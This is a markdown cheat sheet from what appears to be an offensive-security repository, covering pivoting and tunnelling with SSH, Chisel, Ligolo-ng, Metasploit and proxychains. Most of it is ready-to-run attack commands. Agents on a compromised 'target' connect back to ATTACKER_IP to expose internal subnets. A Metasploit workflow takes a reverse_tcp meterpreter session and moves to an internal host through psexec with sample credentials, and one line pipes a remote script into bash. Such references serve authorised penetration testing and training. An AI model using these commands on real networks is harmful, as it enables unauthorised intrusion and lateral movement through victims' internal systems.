daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pivoting-and-tunnelling.md (20060B)


      1 ---
      2 title: "Pivoting and Tunnelling"
      3 description: "Expose a remote service on your local machine."
      4 category: tunneling-pivoting
      5 tags: ["tunneling-pivoting", "sql-injection", "pivoting", "tunneling"]
      6 tools: ["Nmap", "Metasploit", "Meterpreter", "Evil-WinRM", "Chisel"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Misc/Pivoting and Tunnelling .md"
     10 ---
     11 # Pivoting & Port Forwarding Cheat Sheet
     12 ## Practical Command Reference
     13 
     14 ---
     15 
     16 ## SSH Tunnelling
     17 
     18 ### Local Port Forwarding (-L)
     19 Expose a remote service on your local machine.
     20 
     21 ```bash
     22 # Syntax: ssh -L [local_addr:]local_port:dest_host:dest_port user@ssh_server
     23 
     24 # Forward local port 8080 to internal web server 10.10.10.50:80 via jump host
     25 ssh -L 8080:10.10.10.50:80 user@jump.example.com
     26 
     27 # Bind only to localhost (more secure)
     28 ssh -L 127.0.0.1:8080:10.10.10.50:80 user@jump.example.com
     29 
     30 # Forward local 3306 to remote MySQL that only listens on localhost
     31 ssh -L 3306:127.0.0.1:3306 user@dbserver.example.com
     32 
     33 # Multiple forwards in one connection
     34 ssh -L 8080:10.10.10.50:80 -L 3306:10.10.10.51:3306 user@jump.example.com
     35 ```
     36 
     37 ### Remote Port Forwarding (-R)
     38 Expose a local service to the remote network.
     39 
     40 ```bash
     41 # Syntax: ssh -R [remote_addr:]remote_port:dest_host:dest_port user@ssh_server
     42 
     43 # Expose local port 80 on remote server's port 8080
     44 ssh -R 8080:127.0.0.1:80 user@remote.example.com
     45 
     46 # Expose local service to all interfaces on remote (requires GatewayPorts yes)
     47 ssh -R 0.0.0.0:8080:127.0.0.1:80 user@remote.example.com
     48 
     49 # Reverse shell callback - expose attacker's listener
     50 ssh -R 4444:127.0.0.1:4444 user@compromised.example.com
     51 ```
     52 
     53 ### Dynamic Port Forwarding (-D) - SOCKS Proxy
     54 Create a SOCKS proxy to access the remote network.
     55 
     56 ```bash
     57 # Syntax: ssh -D [local_addr:]local_port user@ssh_server
     58 
     59 # Create SOCKS5 proxy on port 1080
     60 ssh -D 1080 user@jump.example.com
     61 
     62 # Bind to localhost only
     63 ssh -D 127.0.0.1:9050 user@jump.example.com
     64 
     65 # Use with proxychains (edit /etc/proxychains4.conf first)
     66 # Add: socks5 127.0.0.1 1080
     67 proxychains4 nmap -sT -Pn 10.10.10.0/24
     68 proxychains4 curl http://10.10.10.50
     69 
     70 # Use with curl directly
     71 curl --proxy socks5h://127.0.0.1:1080 http://10.10.10.50
     72 
     73 # Use with Firefox: Settings > Network > SOCKS5 > 127.0.0.1:1080
     74 ```
     75 
     76 ### Jump Hosts / ProxyJump (-J)
     77 Chain through multiple hosts (OpenSSH 7.3+).
     78 
     79 ```bash
     80 # Syntax: ssh -J user@jump1,user@jump2 user@destination
     81 
     82 # Single jump
     83 ssh -J user@bastion.example.com user@internal.server
     84 
     85 # Multiple jumps
     86 ssh -J user@jump1:22,user@jump2:22 user@final-target
     87 
     88 # With port forwarding through jump
     89 ssh -J user@bastion -L 8080:10.10.10.50:80 user@internal
     90 
     91 # In ~/.ssh/config
     92 Host internal
     93     HostName 10.10.10.50
     94     User admin
     95     ProxyJump user@bastion.example.com
     96 ```
     97 
     98 ### Useful SSH Options
     99 
    100 ```bash
    101 # Background and don't execute remote command
    102 ssh -fN -L 8080:10.10.10.50:80 user@jump
    103 
    104 # Compression (helps on slow links)
    105 ssh -C -D 1080 user@jump
    106 
    107 # Keep connection alive
    108 ssh -o ServerAliveInterval=60 -o ServerAliveCountMax=3 -D 1080 user@jump
    109 
    110 # Disable strict host key checking (lab use only!)
    111 ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null user@host
    112 
    113 # Use specific key
    114 ssh -i ~/.ssh/id_rsa_jump -D 1080 user@jump
    115 
    116 # Verbose debugging
    117 ssh -v -D 1080 user@jump    # -vv or -vvv for more
    118 ```
    119 
    120 ### ~/.ssh/config Example
    121 
    122 ```
    123 Host bastion
    124     HostName bastion.example.com
    125     User jumpuser
    126     IdentityFile ~/.ssh/bastion_key
    127     DynamicForward 1080
    128     LocalForward 8443 internal-web:443
    129     ServerAliveInterval 60
    130 
    131 Host internal-*
    132     ProxyJump bastion
    133     User admin
    134 
    135 Host internal-db
    136     HostName 10.10.10.51
    137     LocalForward 3306 127.0.0.1:3306
    138 ```
    139 
    140 ---
    141 
    142 ## Chisel
    143 
    144 ### Installation
    145 
    146 ```bash
    147 # Download latest release
    148 curl https://i.jpillora.com/chisel! | bash
    149 
    150 # Or from GitHub releases
    151 wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
    152 gunzip chisel_1.9.1_linux_amd64.gz
    153 chmod +x chisel_1.9.1_linux_amd64
    154 mv chisel_1.9.1_linux_amd64 chisel
    155 
    156 # Windows
    157 certutil -urlcache -split -f https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz chisel.gz
    158 ```
    159 
    160 ### Server Mode (Attacker Machine)
    161 
    162 ```bash
    163 # Basic server on port 8080
    164 ./chisel server -p 8080
    165 
    166 # With reverse tunnel support (required for R: prefixed remotes)
    167 ./chisel server -p 8080 --reverse
    168 
    169 # With SOCKS5 support
    170 ./chisel server -p 8080 --socks5
    171 
    172 # With both
    173 ./chisel server -p 8080 --reverse --socks5
    174 
    175 # With authentication
    176 ./chisel server -p 8080 --reverse --auth user:password
    177 
    178 # With TLS (auto Let's Encrypt)
    179 ./chisel server -p 443 --reverse --tls-domain example.com
    180 
    181 # With TLS (custom certs)
    182 ./chisel server -p 8443 --reverse --tls-key server.key --tls-cert server.crt
    183 
    184 # Generate and use persistent key
    185 ./chisel server --keygen /tmp/chisel.key
    186 ./chisel server -p 8080 --reverse --keyfile /tmp/chisel.key
    187 ```
    188 
    189 ### Client Mode (Target/Pivot Machine)
    190 
    191 ```bash
    192 # Connect and forward local port 8080 to server's localhost:80
    193 ./chisel client ATTACKER_IP:8080 8080:127.0.0.1:80
    194 
    195 # Forward local 3000 to remote service at 10.10.10.50:3000
    196 ./chisel client ATTACKER_IP:8080 3000:10.10.10.50:3000
    197 
    198 # SOCKS proxy (server needs --socks5)
    199 ./chisel client ATTACKER_IP:8080 socks
    200 # Creates SOCKS5 on client localhost:1080
    201 
    202 # Custom SOCKS port
    203 ./chisel client ATTACKER_IP:8080 5000:socks
    204 
    205 # REVERSE tunnel - open port on SERVER that forwards to target network
    206 ./chisel client ATTACKER_IP:8080 R:8001:10.10.10.50:80
    207 # Now attacker can access 10.10.10.50:80 via localhost:8001
    208 
    209 # REVERSE SOCKS - SOCKS proxy on attacker, exits on target network
    210 ./chisel client ATTACKER_IP:8080 R:socks
    211 # SOCKS5 on attacker localhost:1080, traffic exits via target
    212 
    213 # Reverse SOCKS on custom port
    214 ./chisel client ATTACKER_IP:8080 R:1080:socks
    215 
    216 # Multiple tunnels
    217 ./chisel client ATTACKER_IP:8080 R:8001:10.10.10.50:80 R:8002:10.10.10.51:22 R:socks
    218 
    219 # With authentication
    220 ./chisel client --auth user:password ATTACKER_IP:8080 R:socks
    221 
    222 # With fingerprint verification (get fingerprint from server output)
    223 ./chisel client --fingerprint XXXXX ATTACKER_IP:8080 R:socks
    224 
    225 # Through a proxy
    226 ./chisel client --proxy http://proxy:3128 ATTACKER_IP:8080 R:socks
    227 ./chisel client --proxy socks://proxy:1080 ATTACKER_IP:8080 R:socks
    228 
    229 # Verbose output
    230 ./chisel client -v ATTACKER_IP:8080 R:socks
    231 ```
    232 
    233 ### Common Chisel Patterns
    234 
    235 ```bash
    236 # PATTERN 1: Reverse SOCKS (most common for pivoting)
    237 # Attacker:
    238 ./chisel server -p 8080 --reverse
    239 # Target:
    240 ./chisel client ATTACKER:8080 R:socks
    241 # Use: proxychains nmap -sT -Pn 10.10.10.0/24
    242 
    243 # PATTERN 2: Access internal web server
    244 # Attacker:
    245 ./chisel server -p 8080 --reverse
    246 # Target:
    247 ./chisel client ATTACKER:8080 R:8001:192.168.1.100:80
    248 # Access: curl http://127.0.0.1:8001
    249 
    250 # PATTERN 3: Forward SOCKS (client-side proxy)
    251 # Attacker:
    252 ./chisel server -p 8080 --socks5
    253 # Target:
    254 ./chisel client ATTACKER:8080 1080:socks
    255 # Configure browser/tools on TARGET to use localhost:1080
    256 
    257 # PATTERN 4: Expose target's SSH
    258 # Attacker:
    259 ./chisel server -p 8080 --reverse
    260 # Target:
    261 ./chisel client ATTACKER:8080 R:2222:127.0.0.1:22
    262 # Attacker: ssh user@127.0.0.1 -p 2222
    263 ```
    264 
    265 ---
    266 
    267 ## Ligolo-ng
    268 
    269 ### Installation
    270 
    271 ```bash
    272 # Download proxy (attacker) and agent (target)
    273 # From: https://github.com/nicocha30/ligolo-ng/releases
    274 
    275 # Attacker (Linux)
    276 wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
    277 tar -xzf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
    278 
    279 # Agent (Linux target)
    280 wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_linux_amd64.tar.gz
    281 tar -xzf ligolo-ng_agent_0.6.2_linux_amd64.tar.gz
    282 
    283 # Agent (Windows target)
    284 # Download: ligolo-ng_agent_0.6.2_windows_amd64.zip
    285 ```
    286 
    287 ### Proxy Setup (Attacker Machine)
    288 
    289 ```bash
    290 # Create TUN interface (required, needs root/sudo)
    291 sudo ip tuntap add user $(whoami) mode tun ligolo
    292 sudo ip link set ligolo up
    293 
    294 # For multiple tunnels, create additional interfaces
    295 sudo ip tuntap add user $(whoami) mode tun ligolo2
    296 sudo ip link set ligolo2 up
    297 
    298 # Start proxy with self-signed cert
    299 ./proxy -selfcert
    300 
    301 # Start proxy with Let's Encrypt (requires port 443)
    302 ./proxy -autocert
    303 
    304 # Custom port
    305 ./proxy -selfcert -laddr 0.0.0.0:443
    306 
    307 # With specific interface binding
    308 ./proxy -selfcert -laddr 10.10.14.5:11601
    309 ```
    310 
    311 ### Agent Setup (Target Machine)
    312 
    313 ```bash
    314 # Linux - connect to proxy
    315 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    316 
    317 # Windows
    318 agent.exe -connect ATTACKER_IP:11601 -ignore-cert
    319 
    320 # Through SOCKS proxy
    321 ./agent -connect ATTACKER_IP:11601 -ignore-cert --socks 127.0.0.1:1080
    322 
    323 # With retry
    324 ./agent -connect ATTACKER_IP:11601 -ignore-cert -retry
    325 ```
    326 
    327 ### Proxy Commands (Interactive Console)
    328 
    329 ```bash
    330 # List connected agents
    331 ligolo-ng » session
    332 
    333 # Select an agent (by ID number)
    334 ligolo-ng » session
    335 ? Specify a session: 1 - user@target - 192.168.1.50:54321
    336 
    337 # Show agent network interfaces
    338 [Agent: user@target] » ifconfig
    339 
    340 # Start the tunnel on default interface
    341 [Agent: user@target] » start
    342 
    343 # Start tunnel on specific interface (for multiple tunnels)
    344 [Agent: user@target] » start --tun ligolo2
    345 
    346 # Stop tunnel
    347 [Agent: user@target] » stop
    348 
    349 # Add listener (port forward from agent network)
    350 [Agent: user@target] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
    351 # Opens 1234 on agent, forwards to attacker's 4444
    352 
    353 # List listeners
    354 [Agent: user@target] » listener_list
    355 
    356 # Remove listener
    357 [Agent: user@target] » listener_del 0
    358 ```
    359 
    360 ### Route Configuration (Attacker Machine)
    361 
    362 ```bash
    363 # Add route to target network through ligolo interface
    364 sudo ip route add 10.10.10.0/24 dev ligolo
    365 
    366 # Multiple networks
    367 sudo ip route add 192.168.1.0/24 dev ligolo
    368 sudo ip route add 172.16.0.0/16 dev ligolo
    369 
    370 # For second tunnel (different agent), use ligolo2
    371 sudo ip route add 10.20.30.0/24 dev ligolo2
    372 
    373 # Verify routes
    374 ip route | grep ligolo
    375 
    376 # Remove route when done
    377 sudo ip route del 10.10.10.0/24 dev ligolo
    378 ```
    379 
    380 ### Complete Ligolo-ng Workflow
    381 
    382 ```bash
    383 # === ATTACKER SETUP ===
    384 # 1. Create interface
    385 sudo ip tuntap add user $(whoami) mode tun ligolo
    386 sudo ip link set ligolo up
    387 
    388 # 2. Start proxy
    389 ./proxy -selfcert -laddr 0.0.0.0:443
    390 
    391 # === TARGET ===
    392 # 3. Run agent (transfer binary first)
    393 ./agent -connect ATTACKER_IP:443 -ignore-cert
    394 
    395 # === ATTACKER PROXY CONSOLE ===
    396 # 4. Select session
    397 ligolo-ng » session
    398 # Select the agent
    399 
    400 # 5. Check target interfaces (note the internal subnet)
    401 [Agent] » ifconfig
    402 # e.g., see 10.10.10.0/24 on eth1
    403 
    404 # 6. Start tunnel
    405 [Agent] » start
    406 
    407 # === ATTACKER SHELL ===
    408 # 7. Add route to internal network
    409 sudo ip route add 10.10.10.0/24 dev ligolo
    410 
    411 # 8. Now you can access internal network directly!
    412 ping 10.10.10.1
    413 nmap -sT -Pn 10.10.10.0/24
    414 curl http://10.10.10.50
    415 ssh user@10.10.10.51
    416 
    417 # === REVERSE PORT FORWARD (for callbacks) ===
    418 # On proxy console:
    419 [Agent] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
    420 
    421 # Now internal hosts can connect to agent:4444, reaches attacker:4444
    422 # Useful for reverse shells from double-pivoted networks
    423 ```
    424 
    425 ### Double Pivot with Ligolo-ng
    426 
    427 ```bash
    428 # First pivot already established to 10.10.10.0/24
    429 # Now pivot through 10.10.10.50 to reach 192.168.1.0/24
    430 
    431 # === ATTACKER ===
    432 # Create second interface
    433 sudo ip tuntap add user $(whoami) mode tun ligolo2
    434 sudo ip link set ligolo2 up
    435 
    436 # Create listener on first agent to relay second agent connection
    437 [Agent: first] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601
    438 
    439 # === SECOND PIVOT HOST (10.10.10.50) ===
    440 # Run agent connecting through first pivot
    441 ./agent -connect 10.10.10.FIRST_AGENT:11601 -ignore-cert
    442 
    443 # === ATTACKER PROXY CONSOLE ===
    444 # Select new session
    445 ligolo-ng » session
    446 # Select second agent
    447 
    448 # Start on second interface
    449 [Agent: second] » start --tun ligolo2
    450 
    451 # === ATTACKER ===
    452 # Add route for deep network
    453 sudo ip route add 192.168.1.0/24 dev ligolo2
    454 
    455 # Now reach 192.168.1.0/24 through double pivot!
    456 nmap -sT -Pn 192.168.1.0/24
    457 ```
    458 
    459 ---
    460 
    461 ## Metasploit Framework Pivoting
    462 
    463 ### Autoroute (Add Routes Through Session)
    464 
    465 ```bash
    466 # From Meterpreter session
    467 meterpreter > run autoroute -s 10.10.10.0/24
    468 
    469 # Or with netmask
    470 meterpreter > run autoroute -s 10.10.10.0 -n 255.255.255.0
    471 
    472 # Print routes
    473 meterpreter > run autoroute -p
    474 
    475 # Delete route
    476 meterpreter > run autoroute -d -s 10.10.10.0
    477 
    478 # Using post module (from msf console)
    479 msf6 > use post/multi/manage/autoroute
    480 msf6 post(autoroute) > set SESSION 1
    481 msf6 post(autoroute) > set SUBNET 10.10.10.0
    482 msf6 post(autoroute) > set NETMASK /24
    483 msf6 post(autoroute) > run
    484 
    485 # Manual route add from msf console
    486 msf6 > route add 10.10.10.0/24 1
    487 msf6 > route add 192.168.1.0 255.255.255.0 1
    488 
    489 # View routes
    490 msf6 > route print
    491 
    492 # Remove route
    493 msf6 > route remove 10.10.10.0/24 1
    494 
    495 # Flush all routes
    496 msf6 > route flush
    497 ```
    498 
    499 ### SOCKS Proxy Module
    500 
    501 ```bash
    502 # Background your meterpreter session first
    503 meterpreter > background
    504 
    505 # Use SOCKS proxy module
    506 msf6 > use auxiliary/server/socks_proxy
    507 
    508 # Configure
    509 msf6 auxiliary(socks_proxy) > set SRVHOST 127.0.0.1
    510 msf6 auxiliary(socks_proxy) > set SRVPORT 1080
    511 msf6 auxiliary(socks_proxy) > set VERSION 5
    512 
    513 # Optional auth (SOCKS5 only)
    514 msf6 auxiliary(socks_proxy) > set USERNAME proxyuser
    515 msf6 auxiliary(socks_proxy) > set PASSWORD proxypass
    516 
    517 # Run in background
    518 msf6 auxiliary(socks_proxy) > run -j
    519 
    520 # Verify it's running
    521 msf6 > jobs
    522 
    523 # Configure proxychains (/etc/proxychains4.conf)
    524 # socks5 127.0.0.1 1080
    525 
    526 # Use external tools through proxy
    527 proxychains4 nmap -sT -Pn 10.10.10.0/24
    528 proxychains4 curl http://10.10.10.50
    529 proxychains4 ssh user@10.10.10.51
    530 ```
    531 
    532 ### Port Forwarding (portfwd)
    533 
    534 ```bash
    535 # LOCAL FORWARD - access remote service locally
    536 meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50
    537 # Now access 10.10.10.50:80 via localhost:8080
    538 
    539 # Forward to target's localhost service
    540 meterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1
    541 # Access target's MySQL on your localhost:3306
    542 
    543 # REMOTE/REVERSE FORWARD - for callbacks from deep network
    544 meterpreter > portfwd add -R -l 4444 -L 0.0.0.0 -p 9999
    545 # Listens on target:9999, forwards to attacker:4444
    546 
    547 # List port forwards
    548 meterpreter > portfwd list
    549 
    550 # Delete specific forward
    551 meterpreter > portfwd delete -l 8080 -p 80 -r 10.10.10.50
    552 
    553 # Delete by index
    554 meterpreter > portfwd delete -i 0
    555 
    556 # Flush all
    557 meterpreter > portfwd flush
    558 ```
    559 
    560 ### Complete Metasploit Pivoting Workflow
    561 
    562 ```bash
    563 # === Initial Access ===
    564 msf6 > use exploit/multi/handler
    565 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    566 msf6 > set LHOST eth0
    567 msf6 > set LPORT 4444
    568 msf6 > run
    569 
    570 # (get meterpreter session)
    571 
    572 # === Enumerate Target Networks ===
    573 meterpreter > ipconfig
    574 meterpreter > arp
    575 meterpreter > route
    576 
    577 # Discover dual-homed: 192.168.1.50 and 10.10.10.50
    578 
    579 # === Add Route ===
    580 meterpreter > run autoroute -s 10.10.10.0/24
    581 meterpreter > run autoroute -p
    582 meterpreter > background
    583 
    584 # === Start SOCKS Proxy ===
    585 msf6 > use auxiliary/server/socks_proxy
    586 msf6 > set SRVPORT 1080
    587 msf6 > run -j
    588 
    589 # === Scan Internal Network ===
    590 # Option 1: Use Metasploit scanner modules (uses autoroute automatically)
    591 msf6 > use auxiliary/scanner/portscan/tcp
    592 msf6 > set RHOSTS 10.10.10.0/24
    593 msf6 > set PORTS 22,80,443,445,3389
    594 msf6 > run
    595 
    596 # Option 2: Use external tools via SOCKS
    597 proxychains4 nmap -sT -Pn -p22,80,443,445 10.10.10.0/24
    598 
    599 # === Exploit Internal Target ===
    600 msf6 > use exploit/windows/smb/psexec
    601 msf6 > set RHOSTS 10.10.10.100
    602 msf6 > set SMBUSER admin
    603 msf6 > set SMBPASS password123
    604 msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp
    605 msf6 > set RHOST 10.10.10.100
    606 msf6 > run
    607 
    608 # (traffic automatically routes through session 1)
    609 
    610 # === Port Forward for Direct Access ===
    611 # Re-enter first session
    612 msf6 > sessions -i 1
    613 meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.100
    614 
    615 # Now RDP to internal host
    616 xfreerdp /v:127.0.0.1 /u:admin /p:password123
    617 ```
    618 
    619 ### Pivoting Through Multiple Networks
    620 
    621 ```bash
    622 # Session 1: Access to 10.10.10.0/24
    623 meterpreter > run autoroute -s 10.10.10.0/24
    624 meterpreter > background
    625 
    626 # Exploit host in 10.10.10.0/24 that has access to 192.168.1.0/24
    627 # Get Session 2
    628 
    629 # Session 2: Access to 192.168.1.0/24  
    630 msf6 > sessions -i 2
    631 meterpreter > run autoroute -s 192.168.1.0/24
    632 meterpreter > background
    633 
    634 # View all routes
    635 msf6 > route print
    636 
    637 # Traffic to 10.10.10.0/24 goes through Session 1
    638 # Traffic to 192.168.1.0/24 goes through Session 2 (which itself routes through Session 1)
    639 ```
    640 
    641 ---
    642 
    643 ## Proxychains Configuration
    644 
    645 ### /etc/proxychains4.conf
    646 
    647 ```ini
    648 # Dynamic chain - skip dead proxies
    649 dynamic_chain
    650 
    651 # Strict chain - all proxies must work
    652 #strict_chain
    653 
    654 # Random chain - random proxy order
    655 #random_chain
    656 
    657 # Quiet mode - less output
    658 quiet_mode
    659 
    660 # Proxy DNS through proxy (important!)
    661 proxy_dns
    662 
    663 # Timeouts
    664 tcp_read_time_out 15000
    665 tcp_connect_time_out 8000
    666 
    667 [ProxyList]
    668 # SOCKS5 proxy (Chisel, Metasploit)
    669 socks5 127.0.0.1 1080
    670 
    671 # SOCKS4 alternative
    672 #socks4 127.0.0.1 1080
    673 
    674 # Chain multiple proxies
    675 #socks5 127.0.0.1 1080
    676 #socks5 127.0.0.1 1081
    677 ```
    678 
    679 ### Proxychains Usage
    680 
    681 ```bash
    682 # Basic usage
    683 proxychains4 nmap -sT -Pn 10.10.10.0/24
    684 proxychains4 curl http://10.10.10.50
    685 proxychains4 ssh user@10.10.10.51
    686 proxychains4 evil-winrm -i 10.10.10.50 -u admin -p password
    687 
    688 # With specific config file
    689 proxychains4 -f /tmp/myproxy.conf nmap -sT -Pn 10.10.10.50
    690 
    691 # Quiet mode
    692 proxychains4 -q curl http://10.10.10.50
    693 
    694 # Note: Only TCP works through SOCKS
    695 # Use -sT (TCP connect) not -sS (SYN scan) with nmap
    696 # ICMP (ping) won't work through standard SOCKS
    697 ```
    698 
    699 ---
    700 
    701 ## Quick Reference Tables
    702 
    703 ### Port Forwarding Syntax Comparison
    704 
    705 | Tool | Local Forward | Remote Forward | SOCKS Proxy |
    706 |------|--------------|----------------|-------------|
    707 | **SSH** | `ssh -L 8080:target:80 user@jump` | `ssh -R 8080:localhost:80 user@jump` | `ssh -D 1080 user@jump` |
    708 | **Chisel** | `chisel client srv:8080 8080:target:80` | `chisel client srv:8080 R:8080:target:80` | `chisel client srv:8080 R:socks` |
    709 | **Meterpreter** | `portfwd add -l 8080 -p 80 -r target` | `portfwd add -R -l 80 -p 8080` | `use auxiliary/server/socks_proxy` |
    710 | **Ligolo-ng** | N/A (use routes) | `listener_add --addr 0.0.0.0:P1 --to 127.0.0.1:P2` | N/A (full routing) |
    711 
    712 ### Common Ports to Forward
    713 
    714 | Service | Port | Example Forward |
    715 |---------|------|-----------------|
    716 | SSH | 22 | `-L 2222:target:22` |
    717 | HTTP | 80 | `-L 8080:target:80` |
    718 | HTTPS | 443 | `-L 8443:target:443` |
    719 | SMB | 445 | `-L 4445:target:445` |
    720 | RDP | 3389 | `-L 3389:target:3389` |
    721 | WinRM | 5985/5986 | `-L 5985:target:5985` |
    722 | MySQL | 3306 | `-L 3306:target:3306` |
    723 | MSSQL | 1433 | `-L 1433:target:1433` |
    724 | PostgreSQL | 5432 | `-L 5432:target:5432` |
    725 
    726 ### Tool Selection Quick Guide
    727 
    728 | Scenario | Recommended Tool |
    729 |----------|-----------------|
    730 | Have SSH access, need single port | SSH -L/-R |
    731 | Have SSH access, need multiple destinations | SSH -D (SOCKS) |
    732 | Need to deploy binary, HTTP egress only | Chisel |
    733 | Need full L3 routing (ICMP, raw nmap) | Ligolo-ng |
    734 | Already have Meterpreter session | Metasploit autoroute |
    735 | Double/triple pivot | Ligolo-ng or Chisel chains |
    736 | Stealth (use existing services) | SSH |
    737 
    738 ---
    739 
    740 ## Troubleshooting
    741 
    742 ```bash
    743 # SSH: Debug connection issues
    744 ssh -vvv -D 1080 user@host
    745 
    746 # SSH: Test if forwarding works
    747 # Local: curl localhost:8080 after -L 8080:target:80
    748 # Check server allows forwarding: grep -i tcpforwarding /etc/ssh/sshd_config
    749 
    750 # Chisel: Verbose mode
    751 ./chisel client -v ATTACKER:8080 R:socks
    752 ./chisel server -v -p 8080 --reverse
    753 
    754 # Ligolo-ng: Verify TUN interface
    755 ip link show ligolo
    756 ip route | grep ligolo
    757 
    758 # Ligolo-ng: Check agent connectivity
    759 # In proxy console: session (should list agents)
    760 
    761 # Metasploit: Verify routes
    762 msf6 > route print
    763 msf6 > route get 10.10.10.50
    764 
    765 # Proxychains: Test
    766 proxychains4 curl -v http://10.10.10.50
    767 
    768 # General: Check listening ports
    769 ss -tlnp | grep 1080
    770 netstat -tlnp | grep 1080
    771 ```
    772 
    773 ---
    774 
    775 ## Sources
    776 
    777 | Tool | Documentation |
    778 |------|---------------|
    779 | OpenSSH | https://man.openbsd.org/ssh |
    780 | Chisel | https://github.com/jpillora/chisel |
    781 | Ligolo-ng | https://github.com/nicocha30/ligolo-ng |
    782 | Ligolo-ng Docs | https://docs.ligolo.ng/ |
    783 | Metasploit Pivoting | https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html |
    784 | Proxychains-ng | https://github.com/rofl0r/proxychains-ng |